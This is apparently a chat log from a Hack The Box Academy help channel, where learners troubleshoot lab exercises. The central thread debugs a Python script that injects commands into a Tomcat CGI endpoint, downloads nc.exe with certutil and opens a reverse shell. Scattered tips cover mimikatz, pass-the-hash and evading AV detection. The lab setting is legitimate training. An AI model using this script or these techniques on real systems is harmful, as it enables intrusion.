#modules
Hey guys, I was reading through the Networking module of HTB and had some confusion. It explains how traceroute works:
The process repeats until the TCP SYN packet reaches the destination host and receives a TCP SYN/ACK or a TCP RST response from the target
However what would happen, if the destination simply drops the packet and doesn't respond would the process keep on going? Or how will the process stop?
It has a timeout and max retry
Oh alright that makes sense. Ty for the help
hello guys, my module is password attacks, pass the ticket from linux
why am i not connecting to david
i want to connect david ssh 172.16.1.15
Attacking Email Services
What is the available username for the domain inlanefreight.htb in the SMTP server?
I am stuck in this module. i have tried
smtp-user-enum -M RCPT -U users.txt -D inlanefreight.htb -t 10.129.69.89
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
| Scan Information |
|---|
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb
######## Scan started at Tue Apr 2 15:41:01 2024 #########
######## Scan completed at Tue Apr 2 15:42:20 2024 #########
0 results.
79 queries in 79 seconds (1.0 queries / sec)
I have also tried the remaining modes in smtp-user-enum (VRFY,EXPN,RCPT)
i am using the usernames list which is provided in the resources. i don't know what is the mistake here.
any help?
you are to connect from the linux host.
@soft cedar
I dont use this version of smtp-user-enum
because it is funky for me..
I used the pip version :
https://github.com/cytopia/smtp-user-enum
Thank you, i'll give it a try.
yes but it has been port forwarded to you on port 2222.
i tried 22 and 2222
can you share the output of the command you used in the pwnbox?
yes, you can just install with pip3 smtp-user-enum.
the syntax is a bit different tho when using it.
It worked!. LOL i don't know that there exist these many tools with the same name and purpose
I tried to connect but it wouldn't connect, so I don't exactly know how to do that since I haven't moved to that module yet.
maybe restart your VM / target.
oky
Hi guys for Advanced XSS and CSRF Exploitation - CORS Misconfiguration section. Can I get some nudge? I developed the exploit. But the withCredentials property in xhr object just doesn't seem to work. It keeps exfiltrating the unlogged in page even though I've already logged in as htb-stdnt in my browser.
same problem on the chapter pass the ticket from windows i have creds
how to report a problem
Then you should contact support.
I think the green HTB logo on the bottom right.
Need to speak to a person? Learn how to reach our support via HTB Labs.
yes it's that, i will know for next, ty
I used my own kali for connection - it works until I try to connect to ssh. (It works fine in parrot os)
2024-04-02 07:31:02 read UDPv4 [ENETUNREACH]: Network is unreachable (fd=3,code=101)
2024-04-02 07:31:03 read UDPv4 [ENETUNREACH]: Network is unreachable (fd=3,code=101)
2024-04-02 07:31:10 read UDPv4 [ENETUNREACH]: Network is unreachable (fd=3,code=101)
Can anyone help me please? I am trying to prepare my parrot OS vm ready for the exam.. I cannot install mysql and crackmapexec to work on it. I created another kali machine and they work on it, but it has problem connecting to ssh for some weird reason
I'm looking at malware for red-teaming ethical purposes, and I'm looking at the Static-Analysis section of this course and it's talking about encrypting shellcode to evade static analysis, I'm assuming this "shell-code" is just the hex code of this program? No tutorial teaches you how to get this shell-code do you just open a hex editor and get it via that or am I getting confused on what shell code actually is?
hei
Hi am new here
Can any one teach me how to hack as a beginner
shellcode is just a small piece of code that can be used as a payload and executed, for example, to get a reverse shell. tools like msfvenom can generate it

Password attacks lab medium. Did enum and found three users. Can I get a hint. How long more or less did you wait for mutated pw to run through these three. I just want to make sure I’m not wasting time
anybody having problems on this challenge in CDSA? inetsim appears to be working fine on VM however the patched shell isnt working
The mutated list from the module should work. But depends obviously what you're using it for.
Ok cool. It’s just slow and I hate wasting time, thanks. Hint for all those: always enum and use what you have user wise
Anon logins are always juicy
Yeah me too - but as a rule of thumb: If it's not working after more than 10 mins, you're probably doing something wrong.
Anyone?
I don’t want generated shellcode, the point is I have code in a file that is detected by default I want to encrypt that and decrypt it at runtime to bypass static analysis
So do I get this “shellcode” or whatever it is via a hex editor? I don’t understand at all
This docx is a pain I encrypted the encrypted and now I can’t open it with anything viable
you can transfer it to a windows vm /box and view it there.
Ugh
or install libreoffice on linux.
Yeah I’m doing libre now
well, I find that convenient, since I could just drag & drop
shellcode is literally just binary data which can be loaded to do something, you can't just turn a program into shellcode, if you want to write them, it's usually written in assembly or from minimal C. if you already have a program that does something, then you can't just run it as shellcode, you'll need to find other ways. there's many resources on this, why don't you use google?
https://www.ired.team/offensive-security/code-injection-process-injection/writing-and-compiling-shellcode-in-c
also this is off topic for this channel
Very late reply but in the dump file what specifically are you searching for in order to get to that block of code? I do see the disable defender. ps1 in the dmp however but no other ps1s
always read the whole text
I've been trying to complete a module for about 30 minutes now
I wasn't reading the entire terminal output from the command and obtaining it several times without noticing
big giga brain
well I already knew the answer so I was searching for that lol you could try and search for various tool names or just "power" I guess. But again, if you aren't familiar with the tool name I'm not sure if you'd recognize it
Hi, I have a question. On Silver annual subscription it says I'd have access to
"- Direct access to all modules up to (including) Tier II",
but on monthly Silver it doesn't show it. Is this a perk only for the people who subscribe for a year?
ye
student plan gives you access to tier 2 modules too
if you can get academic email...
Yeah, I'm 4th year student and have academic e-mail, I'm not sure if it works with my uni (it's in Bulgaria, Eastern Europe)
im also from Bulgaria, mon works....
the problem is that you might lose ur account when the email expires
Thanks, I'm gonna think about it. It expires in a few months so I'd lose all my progress
if your academic email doesn't work, you can reach out to htb and have them confirm your email
I registered with my other e-mail (student email) and it allows me to subscribe for their student plan now.
I'm gonna sub with it for now, not sure when it expires but it's not for at least 3-4 more months. I'll swap later if they delete it.
Thank you very much
for the windows event logs finding evil module can i get help the 1st question didn't provide the right id or time for the answer and now im completely lost for the 2nd one if anyone can give me insight or hints to complete it id be grateful
nvm i got it
Did you ever figure this out? I have the shell but I cannot find anything either
Yes. The monthly and annual plans are different
I'm having a troubling time with DNS and host file for this exercise 💀
I've done the echo 'ip address url' >> /etc/hosts which should fix the missing page or so I think
but I can't seem to get it to work as I intend 
These things can be so finnickity sometimes
Because you need sudo to write to /etc/hosts
Yeah I'm using sudo to write to /etc/hosts I'm aware of that much
Which is why most people will either sudo [text editor] /etc/hosts
Or echo ip domain | sudo tee -a /etc/hosts
Your command shown isn't using sudo
Are you saying you switched to root?
In which case, that's also just bad practice and habits
After you ran your command, did you try reading the /etc/hosts file to see if it even added it?
Yes, I confirmed that it was included within the /etc/hosts file
What does your hosts file look like then
Funnily enough, using nano instead of adding it to the file instead of just the terminal resolved it appropriately
¯_(ツ)_/¯
im in linux PE module, i tried the exact same steps shown in the section Miscellaneous Techniques
but when i try to execute the shell i get this error
the host you compiled the binary in has a newer glibc than the target, either compile in an older version (probably pwnbox) or statically link it
how can i link it
since i may run into this in an exam where pwnbox wouldn't be beneficial to switch to or so
thanks ! i hope i at least don't run into problems like this in exam lol
same problem in pwnbox :/
run ldd --version , the compiling host's version needs to be lower or equal than the target's
i will do it later i turned off my pc, thank you
hello guys. I have stuck on ZAP. I can't set the scope to the site that I want to target
does anyone know how to do it?
you just right click on it and pick add to context
Hii guys, I've been going through the IDS/IPS evasion section of the nmap module, and am having difficulty understanding the concepts.
Can someone please tell me in this "Scan by using different Source IP" example, the - S <ip> is our VM's ip that we are scanning the target with or is it some other ip?
I did it but its still out of scope
It's a simple action, just right click on the site and choose add to new context. https://www.zaproxy.org/docs/desktop/start/features/scope/
is it bc I use pwnbox?
i doubt it
I cant send image here
can I send you a dm?
make sure you're right clicking in the sites or history tab
just use the help page it can explain it better than me, i can't troubleshoot it for you
for some reason I can use the spider mode but not in UI
hi all i'm stuck on file upload attacks module in blacklisted filters whenever i upload a .php file with a test message i send the request to the intruder and do what the module says and start the attack to get non blacklisted extensions however it gives me that every file that i upload regardless of its extensions is allowed (file successfully uploaded) and when i try to reach for that payload i get 404 not found any nugget here ?
DM me
If you're using HUD, make sure you've added the website in the right context, when i use the HUD i have default context and HUD context
Guys, is the windows priv esc skill assessment 1 VM broken? ||Yesterday after trying like 15 different CLSID I managed to get SYSTEM user. Now today the CLSID that worked no longer does and so far I've tried again a lot to no avail.||
ohh okayy I will search for it now
Anyone know what's going on here?
you need to put the folder name in " " if there is a space in it
it thinks you are trying to call "GhostPack" with the argument "Compiled"
Ty. I did not know that
For the NTLM Cross-protocol Relay Attacks, question : Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag. I'm getting this error : [-] Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]
I'd appreciate some help please.
Is it broken or did someone actually do it ?
Why won’t it let me upload a picture?
ez way is start typing the folder name and hit tab
These new gpt jailbreaks are so scary
Hey guys! New guy here. Do you guys know if it is allowed to do modules with a vm or another computer instead of using the pwnbox? Because I honestly find it easier to do with a vm but it just hit me that i dont even know if thats legal lol. Thanks in advance ❤️
yes thats the preferred way. they offer the VPN as well since you cant access machines without it
Awesome! Thanks alot 🙂
under each module that has questions there is a vpn. you only need to download it once
then you just sudo openvpn nameofthefile.ovpn
I had no trouble connecting so far nor have I seen those yet (the VPNs). But I assume they will come when I get further into the modules
are you doing the cpts path?
Nah im doing Cracking into Hack the Box
not all sections have questions at the end, not sure about the specific module that you are doing but in cpts path you have these cube marks where it means there are questions you need to complete.
maybe you just reading the introduction section thats why you havent see em?
I'm over with the introduction, but lets be honest it is a noob friendly module. I'm sure they will show up as I progress. So thanks for the headsup
i believe cracking into hack the box has the Web Requests, JavaScript Deobfuscation, and Getting Started modules
I don’t think it worked…
Im doing web requests right now
Can I get some help with cors misconfiguration?
Nah all the modules easy never got stuck ever
guys i'm stuck on Introduction to Academy
Hahaha. Well when I say noob friendly I mean I can actually get through. Trust me i spend alot of time on some of them (all of them)
Hello man can you help me please 2 mins ? I have a problem with my payload ... #!/usr/bin/env python3 import time import requests host='10.129.201.89'#add host to connect port='8080'#add port of host {default:8080} server_ip='10.129.201.89'#server that has nc.exe file to get reverse shell server_port='80' nc_ip='10.10.15.78' nc_port='1234' url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe" url2 = host + ":" + str(port) + "/cgi/cmd.bat?nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe" try: requests.get("http://" + url1) time.sleep(2) requests.get("http://" + url2) print(url2) except: print("Some error occured in the script")
Section : https://academy.hackthebox.com/module/113/section/1097 Last Question
server it is ip target ?
nc_ip it is my machine and host it is ip target server
You should wrap your code in triple backticks
And you need to tell the module, section and question
It is ok ?
No
```
import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.129.201.89'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")
```
alt + print screen to screencap current window, win + shift + s to use snipping tool
That’s better
What module is this?
this
ATTACKING COMMON APPLICATIONS
Attacking Common Applications - Skills Assessment I
okay no problem
Ok, what’s the issue?
when I run my payload it doesn't work I followed the different docs that I saw but I don't understand where my error is
What does it show when you run it
How can host and server ip be the same?
yes bad copy now : I have :
```
import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.10.15.78'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")
```
My http.server :
```
[sudo] Mot de passe de indra :
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.201.89 - - [02/Apr/2024 22:16:11] "GET /nc.exe HTTP/1.1" 200 -
10.129.201.89 - - [02/Apr/2024 22:16:11] "GET /nc.exe HTTP/1.1" 200 -
```
but my shell...
Stuck how? What part.
yes
```
Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi
04/02/2024 12:56 PM <DIR> .
04/02/2024 12:56 PM <DIR> ..
09/01/2021 07:58 AM <DIR> %SystemDrive%
09/29/2021 09:26 AM 73,802 bHPVV.exe
08/31/2021 01:55 PM 48 cmd.bat
04/02/2024 01:16 PM 30 nc.exe
3 File(s) 73,880 bytes
3 Dir(s) 28,375,203,840 bytes free
```
And in my nc.exe I have :
nc.exe 10.10.15.78 1234 -e sh
That’s wrong
You set up a listener on your kali with nc -lvnp 1234
The script executes nc <ip> <port> -e cmd.exe, as it’s windows
You only have to set up a listener
What listener must I use?
I gave you the command
.
So set up http server where you have the nc.exe binary, nc -lvnp 1234 in another window and then run the python script
This is exactly what I did
anybody know how to get an SSH password for login to port 22?
tried Hydra but nothing :/
what are you trying to do, log into a box you spawned? don't brute force ssh
yeah did an nmap and found port 22 open
On what?
now just trying to do ssh @10.10.11.253
perfection box
perfection
unless the module is very specific about attacking ssh, don't attack ssh
Like this?
I don't care
That looks good, strange how it doesn’t get hit
Then you won't get answers here
How did you see the nc.exe on the target machine?
I'm telling you the appropriate place to ask for assistance with a box
Yes I'm a little lost to tell the truth, I've started it twice now and it doesn't work. 🥲
He's doing the perfection box, not an academy module
Yeah I saw
Yes, I've done it twice now and I find myself stuck here again. Could you help me?
?
I haven't done that module
```
import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.10.15.78'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='4444'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&ncat.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")
```
which module is that?
for the Attacking Common Applications - Skills Assessment I - We don't understand why it doesn't work 🥲
yes
it works
Your command shows ncat.exe, yet what's uploaded is nc.exe
Yes it should be the problem
Ncat.exe doesn't exist on the system
look at your exploit code, url1 uploads the nc executable as nc.exe to the remote machine, and then you're trying to use a ncat.exe executable which doesn't exist on the system, because it was uploaded under a different name
btw Marcie do you remember me? you've helped me a lot back then lol
Ok thanks so I go to use nc like on the picture
look py captur please because I had changed to do tests
If I remember you, it's usually a bad sign
yeah I see, just to verify, is port 4444 open in your firewall?
Because it generally means I remember you being an idiot
yes ^^"
It works on my machine @dreamy solar
Did you change your code to reflect 4444?
😭
Did you allow for spaces in your command?
python3 -m http.server 80 in dir where i have nc.exe
nc -lvnp 1234 in other window
```
#!/usr/bin/env python3
import time
import requests
host='10.129.124.251' #add host to connect
port='8080' #add port of host {default:8080}
server_ip='10.10.15.2' #server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.2'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + >
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")
```
```
import time
import requests
host='10.129.201.89' #add host to connect
port='8080' #add port of host {default:8080}
server_ip='10.10.15.78' #server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")
```
don't you have command execution on the victim?
i may have missed some context but you posted a pic of you being able to execute 'dir' on a remote system through a webpage, is that the computer you're trying to get a shell on?
it doesn't work it's really weird did you make another modification???
yes
can you show me the directory where you run your python http server?
If you have command execution, why are you trying to get a shell
And you have a nc listener on 1234?
To make it easier to find the flag
and because it is the exercise in the end
check the desktop
all this time with that shell you could have found it by now, easier to just curl
yes it is my host limit I go to do exercise on the machine Parrot VM
are you on the vpn?
yes
Btw, you can use metasploit to achieve this.
Try it from parrot
if you know the cve.
nothing 
Ohhh I see where you’re wrong
The nc.exe needs to be the actual nc.exe binary. Not some self made file
hello guys, i have question i use the carlos keytab file and access the carlos directory but cant read file or download how to read carlos.txt or download
Remove the -c ls
Or change it to -c cat carlos.txt
If you chose the former you can get Carlos.txt after connecting to it
smbclient //dc01/carlos/carlos.txt -k -c cat
But I just do a Chmod +x ?
No
You need to download the nc.exe binary from GitHub
ohhh
Or just get a kali vm like I said
okkk
Because they have windows binaries installed
yes im connected but i can not read the file, i tried get, cat, more
wow Okayy thanks !!
If you’re connected, do get carlos.txt
smbclient //dc01/carlos -k
get carlos.txt
hah oky
You're getting a bad network name because smbclient only connects to directories, you need to get rid of the "Carlos.txt" then try reading it again, as it shows here its trying to access //dc01/carlos/carlos.txt/ as a directory
You'd need to first connect to the share then get the file
This might be a stupid question - and if it is so I apologize from the get go - but I remember silver monthly subscription was providing access to all modules up to Tier 2. Did this change or my account is having a hiccup?
With -c get filename
At the end, since it was the cat command, I tried adding it like that, but it actually works as you said, I solved it, thank you.
Silver annual does, not monthly
Yes it's also because cat doesn't know how to read a blank input
Ah thank you for the clarification.
Hi, quick question about the Attacking Enterprise Networks module. I've found the initial access, but my reverse shell crashes (I'm using nc as a listener). I've also stabilised it. I'm asking this to find out if it's a network problem or if I need a special conf for the reverse shell.
Maybe connection problems
That explains why my pwncat doesn't work either x)
I've also noticed that when I run my burp command from the repeater, the request is on standby, and as soon as my shell crashes, I get the response
https://academy.hackthebox.com/module/143/section/1423
need some help with this. After using mimikatz ||kerberos::list /export|| command, it should dump the kirbi files to folder I'm currently in however nothing is generated.. there's no errors when I run the command either.
try this
i get this error: ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
do you use privilege::debug ?
I have a question for a machine, I can't make a "nmap -sCV [IP]" and it didn't happen in the video of the resolution
I did
It's blocking the ping probes
hi guys anybody having the same issue as I am here?
I have a question. I took the kt file of the svc workstations user and connected with smbclient, but I don't know how to go further.
i have aes256 hash for svc user
module - Pass the Ticket (PtT) from Linux
what's the module, can you share a screenshot
Crack the ntlm hash
Which keytab did you extract?
kt
Use the all.kt
python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
i use this file
Wrong one, look at the above message.
i found out why it wasnt writing a file, was running "base64 /out:true" which looks to me as it just cats out the hash instead of writing it to a file
been on this one for 2 days now. im just lost. i used all the tools in the lesson but i dont have access to sudo. do i need to escalate privileges? i want to run lazagne but cant as a normal user. this is Credential Hunting in Linux in Password Attacks
No need for privesc, there is the firefox tool though
ah okay ill keep looking. ill come back in an hour if i have no progress xd
got it! thank u
on the ssh host 2.27
in my linux vm 2.37
so i found the two shadow files i need to unshadow. tried wget on my machine (tried running nc on the targets machine) and scp. neither were able to get this file downloaded. can someone point me in the right direction?
lmao i just compiled it in the ssh host, and then transferred it to my machine as root so it changed the owner to root, deleted the first compiled shell in the ssh and transferred it from my linux vm
so i can have now a compiled shell with root owner and compiled in the wanted library
has anyone figured out the logrotate task in linux privesc module? i found the writable file and logrotten executes the payload but no shell
It looks like you don't have permission to write to /home/
You need to trigger logrotate to do its job
you need to trigger the rotation , force it
thank you both @buoyant void and @crystal steeple ! i was able to get in and grab the flag before it closed rn!
Good job! I know that took me a little bit to figure out as well
There's three (if I recall correctly) parts that need to be patched out. Seems like you might have missed one.
i patched all 3 but couldnt get past it..however I did not patch the 2nd one and Im able to bypass it.. I guess the section needs an updating
Im able to finish the challenge now
If it's a tier 0 module the cubes come from completing the module
Also delete the image as its a spoiler you goon
yes boss
and one more thing. i know /var/mail/htb-student was one of the answers, but it didnt exist in the htb-student system. wont this be confusing for new comers?
It's in the env
Specifically the MAIL environment variable
correct me if im wrong but the module "Linux Fundamentals" didnt brush up on the $MAIL variables beforehand.
It does talk about the env command, which lists environment variables
i see
Not important, it was definitely in poor taste. This also isn't the relevant channel to discuss random things
when running hashcat against this list, can i go ahead and remove all hashes for all the other users? i only need to find root. its taking a long time running it against rockyou.txt
My pfp has nothing to do with it
Yeah you can just copy the root line into its own file
got it thank you!
It's a turn of phrase ya goon
i want to make sure im reading this correctly, this example is showing how to do it on your attack machine right? it would make no sense (to me) to use my /passwd and /shadow to get the flag. its referring to using the .bak's i got from the target?
Yes
Your unshadowed file looks correct
Excuse me, I got a notification saying "these people are talking about sexual harrasment". How can I stop it?
cool, its just taking awhile to crack i guess ;/
Don't have skill issue
But its a thing you have to go into server settings for
Okay.
Sounds like their cpu is mid
yeah
plus the progress is in ~ 32%
are you doing the right thing?
Granted I'm surprised my Frankenstein system works... I'm fairly certain at this point my laptop is possessed
you're running it on bare metal? vm adds a ton of overhead
im not supposed to run this on virtualbox? ^ this is what im working with
hashcat in vms is very slow, do it in your host
use the mutated wordlist
@autumn pilot which mutated? mutated with the Loveyou1 password? or just use the password list they had in the resources
or custom.rule + password.list
Which path to do after "InfoSec Foundations"?
this ^
thank you ill give it a shot in the morning
Information Security Foundations is the prerequisite for the Penetration Tester job path
do you need to know reverse engineering + advanced programming to find 0 days?
if you're interested in web, go for Bug Bounty Hunter instead
or if you feel like blue teaming, check out the extra modules from the SOC Analyst Prerequisites skill path (there's quite an overlap)
does hackthebox teach u the process behind finding zero days in pen test path?
@soft cedar
No
you can just ask your question here bro.
you've got the entire database at your disposal
check the tables.
double clicked on it
it just opens prompts with some attributes
can I see?
and then you might want to delete them after, since they contain spoilers.
see
.
hey guys a quick help if you know. I am on Kerberoasting from windows and follow the example with mimikatz. The commands I used are base64 /out:true and kerberos::list /export
all work good but I dont see any files saved.. Do you know why?
nothings there
Just telling me to see it is not going to make me see it as to me it sounds like you want to be handheld at every step and showing that you are uncertain what you want to do
Instead of pasting screenshots from the exercises, try to craft some short explanation of what you have been trying to do
And don't forget all of the exercises be it in sections or skills assessments are based on the knowledge you gain through the sections
there was no training for MSSQL
If you skipped the base64 output, it will be written to the disk.
there is literally a section called MSSQL in the footprinting module
Thanks
Hello ! I have a question regarding the Windows AD Enumeration module.
I wanted to know if it's normal to not have the MDNS protocol's entries via wireshark and via tcpdump.
I don't know why, but for example tcpdump doesn't work very well, a huge part of the packets is dropped by the kernel.
Responder works well.
I'm connected via ssh to the parrot vm (for tcpdump).
You can connect via RDP to the target VM and use wireshark
I did this too, I did not mention it, sry. wireshark or tcpdump do not work to capture MDNS packets. That is not a real problem, but I wanted to know if it is related to the vm or a configuration and wanted to capture the packets by myself instead of just looking at the pictures.
I've just tried with wireshark and was able to see the MDNS requests, make sure you to start wireshark using sudo -E wireshark
Yeah ok, I'll do this again. That's the command I used. Maybe the vm was unstable.
Ok, I suppose that I am doing something wrong, but no mdns packets. Only NBNS, ARP and tcp packets.
can someone help me with Advanced SQL Injection Skills Assessment. i am able to extract column_names but the column name for the passwords has some weird behavior. i think the password should begin with a known character because of the hashtype, anyone have time to check some things with me.
Is anyone able to give some pointers on 'AD Enumeration & Attacks - Skills Assessment Part II' Q8, I've been stuck here for a while, running out of ideas
Hi, you can dm if you are still blocked 😉
dump things and check what you can access with the things you found
Hi Folks, in the Linux Privilege Escalation module, in the restricted shell escape module, I managed to break out of the shell from outside, but wanted to check if someone found an alternative method from within the shell ?.
hehe ok, well if your memory comes back feel free to ping 😄
I've gotten myself a meterpreter reverse shell on SQL01, and I managed to dump the hashes and got the administrator NTLM hash, couldn't crack it with rockyou.txt so tried to pass the hash with it to access MS01, but all the methods I've tried to pass the hash didn't work
there are other things you can dump than just the system hive
you've gotten the local admin's hash, which is not a domain account, so it wouldn't work on other hosts
you can also use ||echo||
Thanks, I tried a few things in || echo|| but not all of them. I managed to do it with || no profile trick || as well
yeah, just ||echo *|| to list the files in the dir first. then you can read the flag.
Dumped the logonpasswords, found clear text pw for ms******, bloodhound says that it has local admin rights on MS01
yep
anybody have any insight on this? been at it for 2 days now 😅
did the module ask you to run the sed command? the openssl command is just
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Clear text password didn't work, but managed to pass the hash and got access. Thanks for the tip!!!
@next bronze ive tried both with and without sed. is cert.pem supposed to contain both private key and certificate?
yep
the mut password list really really does not work
retried like 6 times over the past 5 hours to no avail
Is there other ports open?
What module and section are you doing
Overall I wouldn’t recommend bruteforcing ssh with a big list, as it’s much slower
academy password attacks > mutations part
I have been staring at my terminal for the past 6 hours for this shit
You made the mutation list with the password list from the resources, and the custom rule you created in the section?
yep
even tried everything such as removing anything with less than 10 char
and only taking top 20k or top 5k as some of the prev convos here suggested
Try bruteforcing ftp, with a bit less threads
already did it with 64t
Try 48
The attack does still take some time though, but should work
nope the thing nuked itself
ugh I need something to do while mist went bust
for the 6th time today alright
regex timez I guess
sorry sir
capital B or every single b
If I remember correctly it was a capital B
You can remove everything before that in the list
If you then use hydra with 48 threads on ftp, it should work
@earnest mulch got it?
Would I be equipped with the necessary toolset for hacking boxes after completing penetration tester path?
anyone know if we can get the htb academy badges to show our real name instead of username?
Where am I making a mistake here?
im connect the julio smb share and im use julio ccache file
pass the ticket from linux
julio 2 file expire
there's 2 of those, did you try both?
also you don't have to use a command with smbclient, you can just connect to it
yup
im try 2 file
krb5cc_647401106_HRJDux
krb5cc_647401106_dfFgjE
klist says expire
I'm having trouble with the module "AD Enumeration & Attacks - Skills Assessment Part I". One of the domain hosts in the attack path doesn't seem to be up? Does anyone know how to find a box ops person?
you sure you've tried both? do it again
oky
in INTRODUCTION TO MALWARE ANALYSIS - Skills Assessment , Examine the communication patterns of the malware and provide the domain it interacts with as your answer. Answer format: .._ . I've used x64dbg on apple.exe I've tried to find the domain in Symbols tab and reference tab but I couldn't, can someone help me ?
you can reset the lab
I've reset it a couple times already. So I'm guessing there's a higher probability that something is wrong with the environment.
its work -_-
most probably not, what host is down
Perhaps any of you who have been working on this module lately? I'm starting to wonder if it's just me?
if you've reset the lab and it's still the same, it's likely you're doing something wrong
u see i can't lookup SQL01
I can't get to it even if I get an SPN account.🥲
ms01 is ok .That's why I suspect there's something wrong with the environment. Or what am I doing wrong?
you don't have to reach the host to kerberoast, the spn is associated with an account, not a host
I've finished kerberoasting(the SPN MSSQLSvc/SQL01.inlanefreight.local:1433). So I need to get to that host(SQL01), don't I?
but you can't find that host, correct? so move to somewhere else
hey guys i've been struggling on this question. So far I have found the service on the port and scanned some other ports but I am having trouble finding exploits for the services
Maybe something here? https://wpscan.com/wordpress/561/
I've had a look but idk exactly what i'm looking for in terms of something that will help me get to the flag 😭
did you look at the webpage in your browser?
I have tried but it ends up saying that it is unable to connect idk if im doing something wrong
reset then
okay thanks i'll try again from scratch
i dont understand this question
Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
What exactly does he want me to do?
same thing as what you did previously, just with a different user to a different directory
im root in machine
What is the name of the network interface that MTU is set to 1500? is the question im stuck on, i watched a video on how to do it and the answer is ens192 but on my pwnbox it comes up as eth0
ssh into the target
how
ssh user@ip then enter the password
the section itself taught you how to do it, there's a whole paragraph on "Logging In via SSH"
nope I'm afk right now
it keeps saying connection timed out
is the ip correct?
yes
are using a vm or the in browser pwnbox
browser
works for me
just switch vpn server, you'll get a new box, also wrong channel, read #welcome to get verified
was rConfig from Shells n payloads slow for other too? it takes 10 sec or more to even switch tabs. did the other section before with status.inlane and worked perfectly 
skill issue 

switch vpn servers maybe
Anyone else having problems with ssh into labs? I'm using pwnbox in the browser on linux priv esc module
kk sory
did that as well. no help. and the first time we met with the rConfig site it was insanely slow as well.... maybe site issue?
maybe
do I put the password on the same line
cus I haven't been
no just user@ip and enter, then it will ask for password, just type it in even if you don't see it appear on screen
it just freezes for like 1 min and then says connection timed out
There is an issue for me too, ssh is just hanging
reset both pwnbox and the target then
I already have and it did the same
Yea me too, I think there must be a problem because some other people are having issues with vpn
Why when I am trying to access to the file I am getting an "no found" ? https://academy.hackthebox.com/module/136/section/1289
I used all wordlists shown in this section and I tested all files when I was getting "file uploaded" and the only thing I got one time : "Forbidden".
I tried to combine the forbidden case with char inj but all are "forbidden".
Consider double-reverse extensions ?
if regular way didn't work then try that.
I used it.
I think the prob comes from the wordlists from HTB.
I am looking at an article to have all extensions.
I got +600 shells extensions now.
Before only 72 with techs from the section.
so you got it ?
Hi guys, the target spawned for me but it doesn't respond, anyone with the same issue?
same
Anybody complete the Windows Privesc module , SeImpersonate and SeAssignPrimaryToken section recently, cannot connect via mssqlclient.py , tried nmap and no open ports, almost like this section is broken
anyone?
@prince_1hunter it seems we have similar problems, mate.
I switched to another VPN (US West) and Im good to go
The vpns don't have region names
